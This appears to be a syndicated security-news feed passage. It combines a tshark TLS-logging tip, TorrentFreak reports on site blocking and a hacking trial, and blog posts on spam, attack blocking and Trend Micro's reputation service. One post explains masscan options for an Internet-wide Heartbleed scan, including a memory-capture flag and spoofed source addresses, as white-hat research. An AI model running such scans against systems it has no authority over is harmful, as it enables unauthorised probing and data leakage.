tshark -r ssl -2R ssl.handshake.type==2 or ssl.handshake.type==1 -T fields -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version -e ssl.handshake.ciphersuite

For extra credit log the host name requested in the client hello via SNI and compare it to the actual host name the client connects to.

Now you can not only collect Real Data as to what ciphers are needed, but you can also look for anomalies. For example, user agents that request very different ciphers then other connections that claim to originate from the same user agent. Or who is asking for weak ciphers? Maybe a sign for an SSL downgrade attack? Or an attack tool using and older SSL library…

[1] http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#logformats[2]


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Anti-Piracy Group Plans to Block In Excess of 100 Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

stop-blockedWhen copyright holders turn to the courts for a solution to their problems it’s very rare that dealing with one site, service or individual is the long-term aim. Legal actions are designed to send a message and important decisions in rightsholders’ favor often open the floodgates for yet more action.

This is illustrated perfectly by the march towards large-scale website blocking in several regions around the world.

A topic pushed off the agenda in the United States following the SOPA debacle, web blockades are especially alive and well in Europe and living proof that while The Pirate Bay might the initial target of Hollywood and the record labels, much bigger plans have always been in store.

A typical example is now emerging in Austria. Having spent years trying to have streaming sites Kino.to, Kinox.to and Movie4K blocked at the ISP level, anti-piracy group VAP has just achieved its aims. Several key local ISPs began blocking the sites this month but the Hollywood affiliated group has now admitted that they’ve had bigger plans in mind all along.

Speaking with DerStandard, VAP CEO Werner Müller has confirmed that his group will now work to have large numbers of additional sites banned at the ISP level.

Using a term often used by Dutch anti-piracy group BREIN, Müller says his group has compiled a list of sites considered by the movie industry to be “structurally infringing”. The sites are expected to be the leaders in the torrent, linking and streaming sector, cyberlockers included. IFPI has already confirmed it will be dealing with The Pirate Bay and two other sites.

The VAP CEO wouldn’t be drawn on exact numbers, but did confirm that a “low three digit” number of domains are in the crosshairs for legal action.

Although Austria is in the relatively early stages, a similar situation has played out in the UK, with rightsholders obtaining blocks against some of the more famous sites and then streamlining the process to add new sites whenever they see fit. Dozens of sites are now unavailable by regular means.

If VAP has its way the blockades in Austria will be marginally more broad than those in the UK, affecting the country’s eighth largest service providers and affecting around 95% of subscribers.

Of course, whenever web blockades are mentioned the topic of discussion turns to circumvention. In Austria the blockades are relatively weak, with only DNS-based mitigation measures in place. However, VAP predicts the inevitable expansion towards both DNS and IP address blocking and intends to head off to court yet again to force ISPs to implement them.

Describing the Internet as a “great machine” featuring good and bad sides, Müller says that when ordering website blocks the courts will always appreciate the right to freedom of expression.

“But there’s no human right to Bruce Willis,” he concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Gottfrid Svartholm Hacking Trial Nears Conclusion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

gottfridThe hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice concluded this week in Copenhagen, Denmark. Gottfrid is most well known as one of the founders of The Pirate Bay, but his co-defendant’s identity is still being kept out of the media.

The sessions this week, on October 7 and 10, were used for summing up by the prosecution and defense. Danish language publication DR.dk, which has provided good coverage of the whole trial, reports that deputy prosecutor Anders Riisager used an analogy to describe their position on Gottfrid.

Prosecution: Hands in the cookie jar

“If there is a cookie jar on the table with the lid removed, and your son is sitting on the sofa with cookie crumbs on his mouth, it is only reasonable to assume that it is he who has had his paws in the cookie jar,” he said.

“This, even though he claims it is four of his friends who have put the cookies into his mouth. And especially when the son will not reveal who his friends are, or how it happened.”

Riisager was referring to the evidence presented by the prosecution that Gottfrid and his co-defendant were the people behind hacker attacks on IT company CSC which began in 2012.

The Swede insists that while the attack may have been carried out from his computer, the computer itself was used remotely by other individuals, any of whom could have carried out the attacks. Leads and names provided by Gottfrid apparently led the investigation nowhere useful.

Remote access unlikely

That third-parties accessed Gottfrid’s computer without his knowledge is a notion rejected by the prosecution. Noting that the Pirate Bay founder is a computer genius, senior prosecutor Maria Cingari said that maintaining secret access to his machine over extended periods would not have been possible.

“It is not likely that others have used [Gottfrid’s] computer to hack CSC without him discovering something. At the same time the hack occurred over such a long time that remote control is unlikely,” she said.

And, Cingari noted, it was no coincidence that chatlogs found on Gottfrid’s computer related to so-called “zero-day” vulnerabilities and the type of computer systems used by CSC.

Dane and Swede working together

In respect of Gottfrid’s co-defendant, the prosecution said that the 21-year-old Dane knew that when he was speaking online with a user known as My Evil Twin (allegedly Gottfrid), the plan was a hacker attack on CSC.

Supporting their allegations of collusion, the prosecution noted that the Dane had been living in Cambodia when the attacks on CSC began and while a hacker attack against Logica, a crime for which Gottfrid was previously sentenced, was also underway. The Dane spent time in a café situated directly under Gottfrid’s apartment, the prosecution said.

Why not hand over the encryption keys?

When police raided the Dane they obtained a laptop, the contents of which still remain a secret due to the presence of heavy encryption. The police found a hollowed-out chess piece containing the computer’s SDcard key, but that didn’t help them gain access. Despite several requests, the 21-year-old has refused to provide keys to unlock the data on the Qubes OS device, arguing there is nothing on there of significance. According to the prosecution, this is a sign of guilt.

“It is very striking that one chooses to sit in prison for a year and more, instead of just helping the police with access to the laptop so they can see that it contains nothing,” senior prosecutor Maria Cingari said.

Cingari also pointed the finger at the Dane for focusing Gottfrid’s attention on CSC.

“You can see that [the Dane] has very much helped [Gottfrid] with obtaining access to CSC’s mainframe. It is not even clear that he would have set his sights on CSC, if it had not been for [the Dane],” she said.

Defense: No objectivity

On Friday, defense lawyer Luise Høj began her closing arguments with fierce criticism of a Danish prosecution that uncritically accepted evidence provided by Swedish police and failed to conduct an objective inquiry.

“They took a plane to Stockholm and were given some material. It was placed in a bag and they took the plane back home. From there they went to CSC and asked them to look for clues. This shows a lack of an independent approach to the evidence,” she said.

Furthermore, the mere fact that CSC had been investigating itself under direction of the police was also problematic.

“The victim should not investigate itself. CSC is at risk of being fired as the state’s IT provider,” Høj noted.

Technical doubt

Computer technicians presented by both sides, including famous security expert Jacob Appelbaum, failed to agree on whether remote access had been a possibility, but this in itself should sway the court to acquit, Høj said.

“It must be really difficult for the court to decide whether the computer was controlled remotely or not, when even engineers disagree on what has happened,” she noted.

Why not take time to investigate properly?

Høj also took aim at the police who she said had failed to properly investigate the people Gottfrid had previously indicated might be responsible for the hacker attacks.

“My client has in good faith attempted to come up with some suggestions as to how his computer was remotely controlled. Of course he did not provide a complete explanation of how it happened, as he did not know what had happened and he has not had the opportunity to examine his computer,” she said.

Additionally, clues that could’ve led somewhere were overlooked, the defense lawyer argued. For instance, an IP address found in CSC’s logs was traced back to a famous Swedish hacker known as ‘MG’.

“The investigation was not objective. I do not understand why it’s not possible to investigate clues that don’t take much effort to be investigated,” Høj said. “The willingness to investigate clues that do not speak in favor of the police case has been minimal.”

A decision in the case is expected at the end of the month. If found guilty, Gottfrid faces up to four years in jail.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Bellwether

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few months, I have been seeing a huge up-tick on two kinds of traffic: spam and network attacks. Over the last few weeks, I have realized that they are directly related.

“I don’t want any SPAM!” — Monty Python

I used to take pride in my ability to stay off spam mailing lists. For over 12 years, I have averaged 4-8 spam messages per day without using any kind of mail filters. That all changed earlier this year, when I suddenly began getting about 50 undesirable emails per day. That’s when I first enabled the commonly used mail filter called spamassassin.

Although spamassassin reduced the flood by 50%, some spam still got through. Meanwhile the amount of spam dramatically increased from 50 messages per day to 500 or more per day. I tweaked a couple of the spamassassin rules and added in some procmail rules at the final mailbox. Now I’m down to a few hundred per day getting past spamassassin and about 10 per day that make it past my procmail rules.

The good news is that I am very confident that I am not losing any legitimate emails. The bad news is that spammers seem to be seriously upping the volume since at least March of this year.

Each time I register with a new online service, I try to use a different email address. This way, if any service I use has their list acquired by spammers, then I know which server caused the problem. Unfortunately, most of these messages are not going to my service-specific addresses. Instead, they are going to one of my three primary accounts that I give out to people. I suspect that someone I know got infected and had their address list stolen.

These high-volume spam messages are coming from specific subnets. It appears that 2-3 spam groups are purchasing subnets from small hosting providers and then spamming like crazy until they get shutdown. Moreover, the hosting providers appear to be ignoring complaints and permitting the abuse. So far, I have banned all emails from 191.101.xx.xx, 192.3.xx.xx, 103.252.xx.xx, 204.15.135.xx, and 209.95.38.xx. These account for over 800 emails to me over the last month.

I’m not the only person seeing this large increase in spam. There have been similar reports at forums like Symantec and Ars Technica. According to Cisco, spam has increased more than 3x since 2013.

“Oh, what a tangled web we weave when first we practise to deceive!” — Walter Scott

Coinciding with the increase in spam is an increase in web attacks. I have seen nearly a 3x increase in web-based scans and attacks in the last year. Because of this, I have added additional filters to identify these attacks and block the offending addresses.

Using data collected at FotoForensics, I began to look up the banned IP addresses using over 30 different dnsbl sites. About 40% of the time, the address is already associated with suspicious web activity (e.g., port scanning and attacks) and 70% of the time they are already associated with spam.

I have graphed out the attackers over the last 75 days. The size of the dot represents the percent of traffic. Red denotes cities and yellow denotes countries (when the city is unknown). Mousing-over the picture shows the per-country distribution.

Since I am blocking access immediately, there is only one attack recorded per IP address. If a city or country has multiple sightings, then those are multiple addresses that geolocated to the same city/country.

Although the United States generates largest number of network attacks, it is really from cities all over the place. There is no central city. The eight cities that generate the most attacks are Hanoi (Vietnam), Fuzhou (China), Guangzhou (China), Bangkok (Thailand), Nanjing (China), Taipei (Taiwan), Istanbul (Turkey), and Chongqing (China).

The top 10 counties that have attacked my sites are: USA (with 70 sightings), China (62), Germany (42), Ukraine, Thailand, Vietnam, South Korea, India, Taiwan, and Turkey.

Most of these attacks appear to come from subnets. For example, Hetzner Online AG (AS24940) has two subnets that are explicitly used for network attacks: 88.198.160.50 – 88.198.160.61 and 88.198.247.163 – 88.198.247.170. Every IP address in these ranges has explicitly conducted a web-based attack against my server.

By detecting these attacks and blocking access immediately, I’ve seen one other side-effect: a huge (20%) drop in volume from other network addresses. The attacks that I am blocking appear to be bellwethers; if these attacks are not blocked then others will follow. Blocking the bellwether stops the subsequent scans and attacks from other network addresses. This theory was easy enough to test: rather than banning, I just recorded a few of the network attacks and allowed them to continue. This resulted in an increase in attacks from other countries and subnets. Blocking the attacks caused a direct drop in hostile traffic from all over the place.

“Coincidence is God’s way of remaining anonymous.” — Albert Einstein

While I was collecting information on attackers, I tested a few other types of online tracking. For example, it is easy enough for my server to identify if the recipient is using an anonymizing network. I wanted to see if attacks correlated with these systems. Amazingly, the distribution of attacks from anonymous proxies is not significantly different from non-proxy addresses. I could find no correlation.

Here’s the locations of detected anonymizers that accessed my site. This also includes botnets that distribute links to scan across network addresses. Again, each IP address is only counted once:

When it comes to anonymity, we’re mapping the anonymous exit address to a location. With TOR users, you may be physically in France but using an address in Australia. We would count it as Australia and not France. Amazingly, there are not many TOR nodes in this graph. (Probably because many TOR nodes have been banned for being involved in network attacks.)

In these maps, you’ll also notice a yellow dot in the water off the west coast of Africa. That’s latitude,longitude “0,0” and denotes addresses that cannot be mapped back to countries. These are completely anonymous servers and satellite providers. (But keep in mind: just because your server cannot be geolocated, it does not mean that you are truly anonymous.)

The big dots in California are from Google and Microsoft. Their bots appear because they constantly change addresses (like TOR users). The big dot in Japan is Trend Micro. However, the single biggest group of anonymity users are in Saudi Arabia. They change addresses and anonymize HTTP headers like crazy! Asia is also really big on anonymizing systems. I assume that this is because their users are either trying to bypass government filters or are unaware that their traffic is being hijacked by government filters. In contrast, Germany and Poland appear big due to the sheer number of TOR nodes.

Finally, I tried to correlate the use of network attacks or anonymity systems to people who upload prohibited content to FotoForensics.

There is really no correlation at all. The more conservative areas, like Saudi Arabia, most of the Middle East, and Asia, rarely upload pornography, nudity, or sexually explicit content. In contrast, the United States and Europe really like their porn. (Germany is mostly due to the >_ forum that I previously mentioned. Even when shown a warning that they are about to be banned, nearly 80% of the time they consciously choose to continue and get banned. Idiots.)

“It is madness for sheep to talk peace with a wolf.” — Thomas Fuller

By actively blocking the initial bellwether network scans, I have seen that it dramatically reduces the number of follow-up attacks. Overall, I see a significant drop in scans, harvesters, and even comment spammers. Since these addresses are associated with unsolicited email, immediately stopping them from accessing the web server should result in an immediate drop in the volume of spam.

I have since deployed my blocking technology from fotoforensics.com at hackerfactor.com. In the last four days, it blocked over 300 network addresses that were scanning for vulnerabilities, uploading comment-spam, and searching for network addresses.

However, FotoForensics and HackerFactor.com are very small web sites compared to most other online services. Any impact from my own blocking is likely to be insignificant across the whole world. However, it does demonstrate one finding related to spam: there is a direct correlation between web-based scans and attacks, and systems that generate spam emails. If big companies temporarily block access when a hostile scan is detected, then the overall volume of spam across the world should be rapidly reduced.

Darknet - The Darkside: IPFlood – Simple Firefox Add-on To Hide Your IP Address

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact […]

The post IPFlood…

Read the full post at darknet.org.uk

Errata Security: Six-month anniversary scan for Heartbleed

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

I just launched my six-month anniversary scan for Heartbleed. I’ll start reporting early results tomorrow afternoon. I’m dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send us your address ranges to our “abuse@” email address. We’ll lookup the abuse contact email for those ranges and send you what we found for that range. (This offer good through the end of October 2014).

Here is a discussion of the options.

–conf /etc/masscan/masscan.conf
You don’t see this option, but it’s the default. This is where we have the ‘excluderanges’ configured. Because we exclude everyone who contacts us an “opts-out” of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.

0.0.0.0/0
The the “/0″ means “the entire Internet”. Actually, any valid IPv4 address can replace the 0.0.0.0 and it’ll produce the same results, such as “127.0.0.0/0″ to amuse your friends.

-p443
This says to scan on port 443, the default SSL port. At some point in the future, I’ll scan for some other common SSL ports, including the STARTTLS ports like port 25.

–banners
This means to create a full TCP connection with the system and grab “banner” info. In this case, that means sending an SSL “hello” request and to parse the received X.509 certificate. It’ll parse that certificate and dump the hostname from it.

–capture cert
This means to also capture the X.509 certificate. I don’t really care for this scan, but on general principles, grabbing certificates is good for other SSL research. This happens before the heartbleed check.

–heartbleed
This means that after the initial SSL Hello that it will attempt a “Heartbleed” request. In this case, the returned information will just be a “VULN: [Heartbleed]” message for the IP address. If you want more, then “–capture heartbleed” an also be used to grab the “bleeding” information. I don’t do that.

-oB heartbleed.scan
This means to save the results in a binary file called “heartbleed.scan”. This is the custom masscan format that can be read using the –readscan option later to convert to XML, JSON, and other output formats. I always scan using this format, but I think I’m the only one.

–rotate-dir /var/log/masscan
You don’t see it here on the command-line because it’s in masscan.conf (see above), but every hour the contents of “heartbleed.scan” are rotated into this directory and a new file created. That file is timestamped with the current time.

–rotate hourly
You don’t see it here, but it’s in masscan.conf. This means that rotation to /var/log/masscan should happen every hour on the hour. If you start a scan at 1:55, it’ll be rotated at 2:00. It renames the file with the timestamp as the prefix, like 141007-020000-heartbleed.scan, so having it aligned to an even hour makes things easier to work with. Note that “minutely” and “daily” are also supported.

–rate 80000
People don’t like getting scanned to fast, it makes IDS and firewall logs unhappy. Therefore, I lower the rate to only 80,000 packets/second to reduce their strain. This consequently means the scan is going to take 13 hours to complete.

–source-ip 209.126.230.73-209.126.230.76
On the same principle as slowing the rate, spreading across multiple source IP address makes IDS/firewalls squawk less, and makes people less unhappy. We have only a small range to play with, so I’m only using 4 IP addresses. Note that masscan has it’s own TCP/IP stack — it’s “spoofing” these IP addresess, no machine actually exists here. If you try to ping them, you’ll get no response. This is the best way to run masscan, though people still find it confusing.

–source-port 32768-65535
By default, masscan uses a randomly assigned source port. I prefer to use a range of source ports.

The Hacker Factor Blog: Downward Trend

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Over the last few months, I have been enhancing my network defenses at FotoForensics. It is no longer enough to just block bad actors. I want to know who is attacking me, what is their approach and any other information. I want to “know my enemy”.

To gain more knowledge, I’ve begun to incorporate DNS blacklist data. There are dozens of servers out there that use DNS to query various non-network databases. Rather than resolving a hostname to a network address, they encode an address in the hostname and return a code that denotes the type of threat.

This becomes extremely useful when identifying a network attacker. Is the attack personal, or is it a known bot that is attacking everyone on the Internet? Is it an isolated system, or part of a larger network? Is it coming directly, or hiding behind an anonymous proxy network? Today, FotoForensics just identifies attacks. Tomorrow it will identify attackers.

Reputation at Stake

Beyond DNS lookup systems, there are some reputation-based query services. While the DNS blocklist (dnsbl) services are generally good, the web based reputation systems vary in quality. Many of them seem to be so inaccurate or misleading as to be borderline snake oil.

Back in 2012, I wrote about Websense and how their system really failed to work. This time, I decided to look at Trend Micro.

The Trend Micro Site Safety system takes a URL and tells you whether it is known hostile or not. It even classifies the type of service, such as shopping, social, or adult content.

To test this system, I used FotoForensics as the URL.

According to them, my server has never been evaluated before and they would evaluate it now. I looked at my logs and, yes, I saw them query my site:

150.70.97.121 – – [05/Oct/2014:06:35:45 -0500] “GET / HTTP/1.1″ 200 139 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)”
150.70.97.119 – – [05/Oct/2014:06:52:05 -0500] “GET / HTTP/1.1″ 200 139 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)”

The first thing I noticed is that it never crawled my site. It only looked at the opening page. They downloaded no images, ignored the CSS, and didn’t look anywhere else for text to analyze. This is the same mistake that Websense made.

The second thing I noticed was the lie: They say that they have never looked at my site before. Let’s look back at my site’s web logs. The site was publicly announced on February 9, 2012.

150.70.75.28 – – [10/Feb/2012:03:28:56 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.75.28 – – [10/Feb/2012:05:55:32 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.172.102 – – [10/Feb/2012:12:16:30 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.172.102 – – [10/Feb/2012:12:16:34 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.75.28 – – [10/Feb/2012:23:21:51 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.75.28 – – [11/Feb/2012:06:51:29 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.75.28 – – [14/Feb/2012:02:00:48 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.75.28 – – [14/Feb/2012:03:24:48 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
150.70.75.28 – – [14/Feb/2012:03:25:51 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

All of these network addresses are Trend Micro. According to my logs, they visit my site and the “/” URI often. Usually multiple times per day. There were 1,073 visits in 2012, 4,443 visits in 2013, and over 2,463 (so far) in 2014. So I certainly do not believe them when their page says that they have never visited the site before.

Since they clearly scanned my site, I wanted to see the results. I rechecked their service an hour later, a few hours later, and over a day later. They still report it as being untested.

Uploading Content

Trend Micro first got my attention back in 2012, when they were automatically banned for uploading porn to FotoForensics. What happened: someone using Trend Micro’s reputation software uploaded porn to FotoForensics. A few seconds later, the reputation system checked the URL and ended up uploading the same porn, resulting in an automatic ban.

This second upload happened because Trend Micro was checking a GET request. And in this case, the GET was used to upload a URL containing porn to my site.

Besides performing a double upload, these duplicate requests can cause other problems. You know all of those online shopping sites that say “Do not reload or your credit card may be charged a second time”? Trend Micro might cause that second click since they resubmit URLs.

I also noticed that Trend Micro’s reputation checker would occasionally upload URL-based attacks to my site. It appears that some bad guys may be using the reputation checker to proxy attacks. This way, if the attack succeeds then the bad guy can get in. And if it is noticed, then the sysadmins would blame Trend Micro. (These attacks stand out in my logs because Trend Micro uploads a URL that nobody else uploads.)

I tried to report these issues to Trend Micro. Back in 2012, I had a short email exchange with them that focused on the porn uploads. (The reply basically disregarded the concern.) Later, in 2013, I provided more detail about the proxy abuses to a Trend Micro employee during a trip to California. But nothing was ever done about it.

After-the-Fact Scanning

One of the biggest issues that I have with Trend Micro’s reputation system is the order of events.

In my logs, I can see a user visiting a unique URL recorded in my logs. Shortly after the visit, Trend Micro visits the same URL. This means that the user was allowed to visit the site before the reputation was checked. If the site happens to be hostile or contains undesirable content, then the user would be alerted after the fact. If the site hosts malware, then you’re infected long before Trend Micro would alert you of the risk.

To put it bluntly: if Trend Micro is going to be warning users based on a site’s reputation, then shouldn’t the warning come before the user is granted access to the site?

Quality of Reporting

Trend Micro permits users to submit URLs and see the site’s reputation. I decided to spot-check their system. I submitted some friendly sites, some known to be hostile, and some that host adult content… Here are some of the results:

  • Trend Micro: “Safe.”

  • Symantec: “Safe.”
  • Google: “Safe.”
  • Craigslist: “Safe.” Really? Craigslist? Perhaps they didn’t scan some of the escort listings. I gave it the URL to Craigslist “Washington, DC personals”. (I had searched Google for ‘craigslist escorts’ and this was the first result. Thanks DC!) This URL is anything but family friendly. There are subjects like “Sub Bottom Seeking Top/Master for Use and Domination” and “Sunday Closeted Discreet Afternoon Delight”. The Trend Micro result? “Safe”. They classified it as “Shopping” and not adult content.
  • Super T[redacted] (a known porn site). Trend Micro said “Safe” but classified it as “Pornography”. This is a great result and gives me hope for Trend Micro’s system.
  • Singapore Girls. “Safe” and “Adult / Mature Content”. Most other services classify this as a porn site. I wonder where they draw the line between pornography and mature content…
  • Backpage: “Safe, Newsgroups, Shopping, Travel”. I then uploaded the link to their escorts page, which has some explicit nudity and lots of adult content. The result? Safe, Newsgroups, Shopping, Travel. Not even an “18”, “Adult”, or “Mature Content” rating.
  • Pinkbike.com: “Safe, Sports”. I’ll agree with this. It’s a forum for bicycle enthusiasts.
  • 4chan: “Dangerous, Disease Vector”. According to Trend Micro, “Dangerous” means the site hosts malware or phishing. 4chan is not a phishing site, and I have never seen malware hosted at 4chan. While 4chan users may not be friendly, the site does not host malware. This strikes me as a gross misclassification. It should probably be “Safe, 18+, Adult Content, Social Network”.
  • >_: One of 4chan’s channels goes by the name “/b/”. If you see someone talking about “/b/”, then you know they are talking about 4chan’s random topics channel. Outside of 4chan, other forums have their own symbolic names. If you don’t know the site represented by “&gt_”, then that’s your problem — I’m not going to list the name here. This is a German picture sharing site that has more porn than 4chan. While 4chan has some channels that are close to family friendly, the >_ site is totally not safe for work. Trend Micro says “Safe, Blog/Web Communications”. They say nothing about adult content; if Trend Micro thinks 4chan is “dangerous”, then >_ should be at least as dangerous.

With Filename Ballistics, I have been able to map out a lot of sites that use custom filename formats. A side effect is that I know which sites host mostly family friendly content, and which do not. I submitted enough URLs to Trend Micro’s reputation system that they began to prompt me with a captcha to make sure I’m human. The good news is that they knew most of the sites. The bad news is that they missed a lot of the sites that host adult content and malware.

For a comparison, I tested a few of these sites against McAfee’s SiteAdvisor. McAffee actually scanned FotoForensics and reported “This link is safe. We tested it and didn’t find any significant security issues.” They classified it as “Media Sharing”. (I’ll agree with that.) McAfee also reports that 4chan is suspicious and a “parked domain” (WTF?), they reported that >_ wasn’t tested, Craigslist is a safe (no malware) site with “Forum/Bulletin Boards”, and Singapore Girls is “Safe: Provocative Attire”.

Other Lookup Tools

Trend Micro also has an IP address reputation tool. This is supposed to be used to identify whether an address is associated with known spammers, malware, or other online attacks.

At FotoForensics, I’ve been actively detecting, and in some cases blocking, hostile network addresses. I use a combination of a custom intrusion detection system and known DNS Blacklist services. This has dramatically cut down on the number of attacks and other abuses against my site.

I uploaded a couple of network addresses to Trend Micro in order to see how they assigned reputations:

  • 178.175.139.141. The Honeynet Project reports “Suspicious behavior, Comment spammer”. Tornevall.org reports “Service abuse (spam, web attacks)”. My own system identified this as a TOR node. Trend Micro reports: “Unlisted in the spam sender list”.

  • 185.8.238.25. This is another Suspicious behavior, Comment spammer, TOR node. Trend Micro fails to identify it.
  • 66.249.69.35. Honeynet Project says “Search engine, Link crawler”. My system identifies it as Googlebot. Trend Micro says “Unlisted in the spam sender list”. This looks like their generic message for “not in any of our databases”.

    Keep in mind, tracking TOR nodes is really easy. If you run a TOR client, then your client automatically downloads the TOR node list. For me, I just start up a client, download the list, and kill the client without ever using TOR. This gives me a large list of TOR nodes and I can just focus on the exit nodes.

    At minimum, every TOR node should be associated with “Suspicious behavior”. This is not because users using TOR are suspicious. Rather, it is because there are too many attackers who use TOR for anonymity. As a hosting site, I don’t know who is coming from TOR and the odds of it being an attacker or spammer are very high compared to non-TOR users.

  • 91.225.197.169. This system actively attacked my site. Trend Micro reports “Bad: DUL”. As they define it, “the Dynamic User List (DUL) includes IP addresses in dynamic ranges identified by ISPs. Most legitimate mail sources have static IP addresses.”

    A Dynamic User List (aka Dialup User List), contains known subnets that are dynamically assigned by ISPs to their customers. These lists are highly controversial. On one hand, they force ISPs to regulate all email and take responsibility for reducing spam. On the other hand, this approach ends up blacklisting a quarter in the Internet. In effect, users must send email through their ISP’s system and users are treated as spammers before ever sending an email.

    If this sounds like the Net Neutrality debate, then you’re right — it is. Net neutrality means that ISPs cannot filter spam; all packets are equal, including spam. Without neutrality, ISPs are forced to help mitigate spam.

    The good news is, Trend Micro noticed that this was an untrustworthy address. The bad news is that they classified it because it was a dynamic address and not because they actually noticed it doing anything hostile.

  • 208.66.72.154. This system scanned my site for vulnerabilities. The Honeynet Project says “Suspicious behavior, Comment spammer”. Tornevall.org reports “Service abuse (spam, web attacks)”. Trend Micro? “Unlisted in the spam sender list”.

Alright… so maybe Trend Micro is only looking for spammers… Let’s submit some IP addresses from spam that I recently received.

  • 46.174.67.107. Other systems report: Suspicious behavior, Comment spammer, Known proxy, Service abuse (spam, web attacks), Network attack. Trend Micro reports “Bad: DUL”. Again, Trend Micro flagged it because it is a dynamic address and not because they noticed it doing anything bad.

  • 198.12.97.72. None of the services, including Trend Micro, identify it. As far as I can tell, anything from 198.12.64.0/18 is spam. This range currently accounts for a solid 30% of all spam to my own honeypot addresses.
  • 191.101.45.39. The blacklist services that I use found nothing. JP SURBL identifies it as a spammer’s address. Trend Micro reports it as “Bad: QIL”. According to them, the Quick IP Lookup Database (QIL) stores known addresses used by botnets.

    Botnets typically consist of a wide range of compromised computers that work together as a unit. If you map botnet nodes to geolocations, you will usually see them all over and not limited to a specific subnet. In contrast to botnets, many spammers acquire large sequential ranges of network addresses (subnets) from unsuspecting (or uncaring) hosting sites. They use the addresses for spending spam. While these spam systems may be remotely controlled, the tight cluster is usually not managed like a botnet.

    According to my own spam collection, this specific address is part of spam network that spans multiple subnets (191.101.36.0 – 191.101.47.255 and 191.101.248.0/22). Each subnet runs a different mailing campaign and they are constantly sending spam. This same spammer recently added another subnet: 198.12.64.0/18, which includes the previous 198.12.97.72 address.

    This spammer has been active for months, and Trend Micro flags it. However, they identify it as “Bad: QIL”. As far as I can tell, this address is not part of a botnet (as identified by QIL). Instead, this spammer signs up with various hosting sites and spams like crazy until getting booted out.

  • 173.244.147.163. Most services, including Trend Micro, missed this. Barracuda Central was the only one to identify this as a spammer.
  • 96.114.154.194. This spammer is listed in the uceprotect.net blacklist, but Trend Micro does not identify it.
  • 197.149.139.101. I caught this address searching my site for email addresses and sending me spam. It is both a harvester and a spammer. This network address is listed in 7 different spam blacklists. Trend Micro reports it as a botnet (Bad: QIL), but it’s actually part of a sequential set of network addresses (a subnet) used by a spammer.
  • 93.174.90.21. This address is detected by tor.dnsbl.sectoor.de, but not Trend Micro.

I certainly cannot fault Trend Micro for failing to identify most of the addresses used for spam. Of the 27 public spam blacklists and the three other blacklists that I checked, all of them had high false-negative rates and failed to associate most addresses with spam. Every blacklist seems to have their own tiny, independent set of addresses and there is little overlap. However, Trend Micro’s subset seems to be significantly smaller than other blacklists. The best ones based on my own testing are b.barracudacentral.org and dnsbl.sorbs.net.

In general, Trend Micro seems correct about the addresses that it flags as hostile — as long as you ignore the cause. Unfortunately, Trend Micro doesn’t know many addresses. You should expect a high false-positive rate due to generic inclusions, and a high false-negative rate (Type-II error) due to their small database. Moreover, many of their matches appear to be caught by generic rules that classify large swaths of addresses as hostile without any proof, rather than any actual detection. This means Trend Micro has a high degree of Type-III errors: correct by coincidence. Finally, Trend Micro seems to classify any network of spam systems as a “botnet”, even when they are not botnets.

About Trend Micro

Trend Micro offers many products. Their anti-virus software is as good as any. But that’s not saying much. As Trend Micro’s CEO Eva Chen said in 2008, “I’ve been feeling that the anti-virus industry sucks. If you have 5.5 million new viruses out there how can you claim this industry is doing the right job?”

Virtually the entire AV industry is reactive. First they detect an outbreak, then then evaluate the problem and create a detector. This means that the attackers always have the advantage: they can create new malware faster than the AV companies can detect and react. The move toward a reputation-based system as a predictor is a good preventative approach.

Unfortunately, Trend Micro seems to have seriously dropped the ball. Their system lies about whether a site has been checked and they validate the site after the user has accessed it. They usually report incorrect information, and when they are right, it seems due more to coincidence than accuracy.

I do believe that a profiling system integrated with a real-time detector is a great proactive alternative. However, Trend Micro’s offerings lack the necessary accuracy, dependability, and reputation. As I reflect on Eva Chen’s statement, I can only conclude one thing: it’s been six years, and they still suck.

TorrentFreak: Court Orders Immediate Pirate Site Blockade

